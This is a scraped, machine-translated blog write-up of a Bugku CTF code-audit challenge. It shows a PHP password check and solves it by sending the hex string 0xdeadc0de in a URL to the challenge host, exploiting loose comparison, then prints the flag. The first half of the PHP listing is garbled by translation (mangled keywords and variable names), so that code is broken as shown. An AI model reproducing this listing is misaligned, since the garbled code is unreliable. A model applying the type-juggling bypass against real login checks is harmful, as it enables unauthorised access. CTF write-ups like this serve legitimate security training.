Code audit - compared with hexadecimal numbers

Others 2019-08-25 18:30:49 views: null 
? < PHP
 the error_reporting (0 ); 

function noother_says_correct ( $ TEMP ) 
{ 
$ In Flag = 'In Flag Test {}' ;
 $ One = the ord ( '. 1'); // the ord - returns the ASCII value of 
$ Nine = the ord ( '. 9'); // the ord - returns the ASCII value of 
$ Number = '3,735,929,054' ; 

// ! All the Check the INPUT characters 
for ( $ I = 0; $ I < strlen ( $ Number ); $ I ++ ) 
{ 
// Disallow all the digits!
$digit = ord($temp{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
// Aha, digit not allowed!
return "flase";
}
}
if($number == $temp)
return $flag;
}

$temp = $_GET['password'];
echo noother_says_correct($temp);
?>

contains the value 3735929054 number of password, and can not have a 9

The value of the hexadecimal number is converted to

payload

http://123.206.87.240:9009/20.php?password=0xdeadc0de

 

flag{Bugku-admin-ctfdaimash}

Guess you like

Origin www.cnblogs.com/gaonuoqi/p/11408145.html
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com